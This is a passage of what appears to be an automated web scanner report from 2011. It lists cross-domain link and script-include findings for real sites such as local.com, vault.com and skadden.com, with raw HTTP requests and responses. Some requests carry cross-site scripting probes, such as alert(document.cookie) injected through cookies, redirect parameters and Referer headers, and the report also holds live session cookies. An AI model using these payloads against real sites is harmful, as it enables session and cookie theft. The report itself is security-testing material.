User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 852
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=;tile=;city=dallas_tx;sz=170x150;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=;tile=;city=dallas_tx;sz=170x150;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.36. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138085
Date: Wed, 19 Jan 2011 16:52:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=pk4wl545lav5a245t34d1zys; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=5331dc09-813f-4b95-9237-fac957ebffac&expdate=634336159381535318&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:18 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310257381535318; domain=local.com; expires=Wed, 19-Jan-2011 17:22:18 GMT; path=/
Content-Length: 138085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
</div>
                <a omn_key="BS1SEM:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
<li><a target="_blank" omn_key="BS1SEM:301:1:1147" onclick="return loc_click(this, true);" href="http://local.ingenio.com/Listings/Details.aspx?NUM=a%3a10356169%3a13%3a3130268%3a14%3a0%3a4&q=law+offices&ls=2" class="blueLink">Visit Website</a>
...[SNIP]...
<li><a target="_blank" omn_key="BS1SEM:301:2:1147" onclick="return loc_click(this, true);" href="http://local.ingenio.com/Listings/Details.aspx?NUM=a%3a9854898%3a13%3a3130268%3a14%3a0%3a4&q=law+offices&ls=2" class="blueLink">Visit Website</a>
...[SNIP]...
<li><a target="_blank" omn_key="BS1SEM:301:3:1147" onclick="return loc_click(this, true);" href="http://local.ingenio.com/Listings/Details.aspx?NUM=a%3a9512474%3a13%3a3130268%3a14%3a0%3a4&q=law+offices&ls=2" class="blueLink">Visit Website</a>
...[SNIP]...
<div class="fl mR5 hidden">
               <img src="http://cr0.worthathousandwords.com/B/C9/A9/B0E90A57716F8AB3B1C4B4371F4.jpg?pid=5650.508&qs=yvFphx%25uiomjfx%2CdmzDx%7C%7D1vstoi4fxq-uyr%40VgJvwrh%C2%82%24Vsxoqpiy%21Ioyxvjf%25%2C%23Oetjq%7F%23Ue%7Ezjxv%2FhltBTdvik%21Yus%29Jhnnr%7C%29Phx%25Ll%7Bq%27js%26Gjpsbx%26e%C2%82%24Ifxz%23Ue%7Ezjxv%29mu%21Fsh%7Bmjb3" alt="" style="width:50px;height:50px" />
           </div>
...[SNIP]...
<div class="fl mR5 hidden">
               <img src="http://cr0.worthathousandwords.com/9/CA/CD/E96CBEEB1FF7E6AEFE422D52325.jpg?pid=5650.508&qs=yvFphx%25uiomjfx%2CdmzDx%7C%7D1SykjynV%C2%80mmu3irv*%7BuqCEjrrszvwl%7D%27Tukfresjxz%23MJ%5E%27ikvFWvm%7Boqp%24Kfgz%23Yvvcqkp%7C%24mpw%265%3E%24%C2%80ffxv7%24Wfwyrwes%21Fjyrgl-%25Rr%C2%80%24Wb%7Eshwx%27Qqgq725%2F" alt="" style="width:50px;height:50px" />
           </div>
...[SNIP]...
<div class="fl mR5 hidden">
               <img src="http://cr0.worthathousandwords.com/7/0B/75/798BC066495B832842A866B660B.jpg?pid=5650.508&qs=yvFphx%25uiomjfx%2CdmzDx%7C%7D1%5Cxlqmkq%7CEuejxvxr5dts%29%7Dxs%3EIkS%7E%7D%27Inv%23%5Bijbqr%23Ue%7Ezjx%29miz%3EJ%7Esnvpfsihm%24Huyuuwi%C2%80t%25lr%7B%24Oju%26Untsbhkpnr%7B%21Wkfjps%2F%25Mh%7D%24Tpwk%23Rrmp3" alt="" style="width:50px;height:50px" />
           </div>
...[SNIP]...
<div class="fl mR5 hidden">
               <img src="http://cr0.worthathousandwords.com/B/38/30/E1E4180C70D11563E80483E0761.jpg?pid=5650.508&qs=yvFphx%25uiomjfx%2CdmzDx%7C%7D1%7Cinmf%7D1lst%27yzoF5%3F.%5Cnhnpls%25Oqsyyz%25Id%7CiF%27ikvFEzl%25gq%29I%7Fqjxlnrjfi%26W%7Bmhm%25Rd%C2%80%24Mjws1%29Qpmqorww%27Sjir%7Fiyfi4%23Ovlf%25Irww%7Cmy4" alt="" style="width:50px;height:50px" />
           </div>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:306:1:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://dallas.citysearch.com/profile/external/604483632/dallas_tx/law_office_of_john_raggio.html">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:306:2:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.carmichaellawyer.com">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:306:3:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.menchulaw.com">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:306:4:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.dallas-dwi-lawyers.com">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:305:3:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.patnaiklaw.com">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:305:5:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.mrichmanlaw.com/">view website</a>
...[SNIP]...
<li class="fl mLR5"><a omn_key="BS1SEM:305:6:1147" onclick="return loc_click(this);" rel="nofollow" class="txtGreen txtUnd" target="_blank" href="http://www.taylorlawoffice.com">view website</a>
...[SNIP]...
<div class="mT15" style="clear:both">
<iframe width="500" height="195" frameBorder="no" scrolling="no" src="http://us.yhs.search.yahoo.com/if?p=law+offices&partnerid=yhs-if-local1&fr=yhs-if-local1&ei=UTF-8" id="yhs-if"></iframe>
...[SNIP]...
<li class="fl pR5"><a omn_key="BS1SEM:303:4:1147" onclick="return loc_click(this);" href="http://www.texaslawpractice.com/" class="txtGreen txtUnd" target="_blank">view website</a>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="BS1SEM:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Businesses+-+SERP+-+SEM" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=Attorneys+%26+Lawyers%3a+General+Practice&cat=business_professional_services&state=TX&city=Dallas&kw=law+offices"></script>
...[SNIP]...

15.37. http://www.skadden.com/2011insights.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2011insights.cfm?contentID=52 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.38. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /alumni/Index.cfm?contentID=7 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<!-- end border table -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.39. http://www.skadden.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.40. http://www.usdirectory.com/gypr.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:09:38 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <m
...[SNIP]...
<![endif]-->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</strong> | <a href="http://www.whitepages.com/12223">Search for People</a>
...[SNIP]...
<div class="actions">
                   <a href="http://maps.google.com/maps?f=q&hl=en&q=2009+Independence+Dr+Ste+104%2c+Sherman%2c+TX+75090&sll=33.65651,-96.6096&ie=UTF8&ct=clnk&cd=1&f=d">Get Directions</a>
...[SNIP]...
<br/><a href="http://www.adapproach.com" class="link_bottom" style="font-size: 90%">Local Search Marketing</a> | <a href="http://www.crawler.com" class="link_bottom" style="font-size: 90%">Crawler Toolbar</a> | <a href="http://screensavers.funutilities.com/" class="link_bottom" style="font-size: 90%">Free 3D Screensavers</a> | <a href="http://www.mp3radio.com" class="link_bottom" style="font-size: 90%">MP3/Internet Radio Player</a> | <a href="http://formfiller.onlinevault.com" class="link_bottom" style="font-size: 90%">Form Filler &amp; Password Manager</a> | <a href="http://www.spywareterminator.com" class="link_bottom" style="font-size: 90%">Antispyware Software</a> | <a href="http://www.crawlersmileys.com" class="link_bottom" style="font-size: 90%">Free Smileys</a> | <a href="http://www.hotbooksale.com" class="link_bottom" style="font-size: 90%">Book Club</a>
...[SNIP]...
<br /><a href="http://www.localeze.com" target="_blank"><img src="http://www.usdirectory.com/img/localeze.jpg" alt="Localeze" style="border-width:0px;" />
...[SNIP]...
<!-- /page -->

<script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
...[SNIP]...
<!-- googlemap -->
               <script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAE-JMB-o0Ahc31nQLRUnvohRaiNNwOm7lzWnD0YFBzfJl4SN-pBTDBxmf4nthO8e9WJbZEPGcSz0IDA" type="text/javascript"></script>
...[SNIP]...

15.41. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
<body>    


   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...

15.42. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:40 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ePZjGFgSahA9PBekBVGAWyf:140i3s34m; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 112414


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...
<div class="tool-email">
       <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22']);">
       <img src="/images/icons/email.png" width="25" height="21" border="0" alt="Email" />
...[SNIP]...
<div class="tool-share">
       <a class="addthis_button" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" href="http://www.addthis.com/bookmark.php?v=250&amp;username=vaultaddthisuser" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Share', 'http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22']);">
       <img src="/images/icons/share.png" width="20" height="21" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...

16. Cross-domain script include  previous  next
There are 122 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=301
Expires: Wed, 19 Jan 2011 15:55:44 GMT
Date: Wed, 19 Jan 2011 15:50:43 GMT
Connection: close
Content-Length: 2277

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=53&b=50020&cid=633862074462733033"> <\/script>
...[SNIP]...

16.2. http://financaspessoais.blog.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:07 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 19 Jan 2011 16:24:14 +0000
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 207203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script>
...[SNIP]...

16.3. http://financaspessoais.blog.br/wp-content/themes/freshnews/styles/tweete-ganhe.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /wp-content/themes/freshnews/styles/tweete-ganhe.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/themes/freshnews/styles/tweete-ganhe.css HTTP/1.1
